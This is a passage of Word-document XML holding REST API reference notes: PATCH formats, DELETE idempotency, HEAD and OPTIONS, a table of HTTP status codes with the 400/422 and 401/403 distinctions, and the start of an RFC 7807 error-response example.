      </w:r>
    </w:p>
    <w:p w14:paraId="79A8F621" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PATCH /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F74925" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Body: {email: "newemail@example.com"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BE05B4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 200 OK + updated resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDAE7F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C0B64" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON Patch format (RFC 6902):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675DB938" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PATCH /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11977489" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Content-Type: application/json-patch+json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E616A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Body: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CC21D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"op": "replace", "path": "/email", "value": "new@example.com"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F39D73E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"op": "add", "path": "/tags/-", "value": "premium"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49034595" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {"op": "remove", "path": "/legacy_field"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9139BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67604AD1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423213E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON Merge Patch (RFC 7396) — simpler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF4841" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PATCH /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F439B7C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Content-Type: application/merge-patch+json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB0D4E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Body: {"email": "new@example.com", "legacy_field": null}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE40E84" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Merges with existing resource, null removes field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D8FB4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="104EDD9C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>DELETE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C986EC2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Remove a resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDDCE16" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Idempotent: multiple deletes → same state (resource is gone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37F204" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C5CFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  DELETE /users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4398586F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 204 No Content (success, resource deleted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46858433" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 404 Not Found (already deleted — or never existed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D6542" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 409 Conflict (cannot delete: has active orders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67924873" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F25BCF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Idempotency implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B913F3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    First DELETE: deletes resource, returns 204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F45F1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Subsequent DELETEs: resource already gone, return 204 (not 404)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B0159" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Treat "already deleted" as success for idempotency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F8228" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="29D115AB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HEAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539127E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Same as GET but no response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09874FA8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Server sends only headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27079861" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Use: check if resource exists, get ETag before conditional GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696D8B7D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8D3AD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07170A53" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Describe communication options for resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3B8D1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  CORS preflight requests use OPTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605F947" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Access-Control-Allow-Methods, Access-Control-Allow-Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38D9FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP status codes — the complete semantic contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F4D13" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C920B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2xx Success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B760E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  200 OK:              Request succeeded, response body contains result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FCCA8F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  201 Created:         Resource created, Location header has URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF390C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  202 Accepted:        Request accepted for processing (async operation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D05673F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  204 No Content:      Success, no body (DELETE, PUT with no return value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356D6FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  206 Partial Content: Range request fulfilled (streaming, pagination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582B8D3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="22F9355F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3xx Redirection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D813243" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  301 Moved Permanently: Resource at new URI, update bookmarks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70720961" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  302 Found:             Temporary redirect (don't update bookmarks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DED4A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  304 Not Modified:      Cached version is current (conditional GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C912C24" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  307 Temporary Redirect: Redirect preserving method (POST stays POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28572544" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  308 Permanent Redirect: Redirect preserving method, permanent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323D606B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="77A8C3FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>4xx Client Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20736F98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  400 Bad Request:       Malformed request syntax, invalid parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078CD3FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  401 Unauthorized:      Authentication required (misleading name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD6C79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  403 Forbidden:         Authenticated but not authorized for this resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58273672" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  404 Not Found:         Resource doesn't exist (or doesn't exist for this user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7360A11B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  405 Method Not Allowed: HTTP method not supported for this endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D118603" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  408 Request Timeout:   Server timed out waiting for request body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044F0F03" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  409 Conflict:          State conflict (e.g., creating duplicate unique resource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFAB79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  410 Gone:              Resource existed but permanently deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56622270" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  412 Precondition Failed: Conditional request failed (ETags, If-Match)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD00898" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  413 Payload Too Large:  Request body exceeds server limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E663E6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  415 Unsupported Media Type: Content-Type not supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21931645" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  422 Unprocessable Entity: Valid syntax but semantic errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA12E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  429 Too Many Requests:  Rate limit exceeded (include Retry-After header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4347D3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="59273212" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>5xx Server Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB8B88D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  500 Internal Server Error: Unexpected server error (bug)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8CD528" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  501 Not Implemented:       Feature not implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DA5ADD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  502 Bad Gateway:           Upstream server error (proxy/gateway context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DCA986" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  503 Service Unavailable:   Server overloaded or in maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C606054" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  504 Gateway Timeout:       Upstream server timeout (proxy/gateway context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C7105" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D68CC59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>The 422 vs 400 distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08742BCE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  400: I cannot parse your request (invalid JSON, wrong Content-Type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC13D86" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  422: I parsed your request but the values make no sense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6226A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       (order quantity is -5, email format is invalid, user_id doesn't exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371C0F1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E03A328" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>The 401 vs 403 distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C972BEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  401: I don't know WHO you are → provide credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7CAFE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  403: I know who you are → you're not ALLOWED to do this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707559CE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61031DB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Common mistake: return 404 when resource exists but user lacks permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F979BEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Security justification: don't reveal existence of resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645672F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Semantic cost: breaks REST contract (client thinks resource doesn't exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F941D43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60336D1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Error response body (RFC 7807 — Problem Details for HTTP APIs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FED6F83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Content-Type: application/problem+json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBD21A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0617FD4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "type": "https://api.example.com/errors/insufficient-funds",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D1BE2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "title": "Insufficient Funds",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C038DAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "status": 402,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F5195" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "detail": "Account balance $23.50 insufficient for transfer of $100.00",</w:t>
      </w:r>
    </w:p>
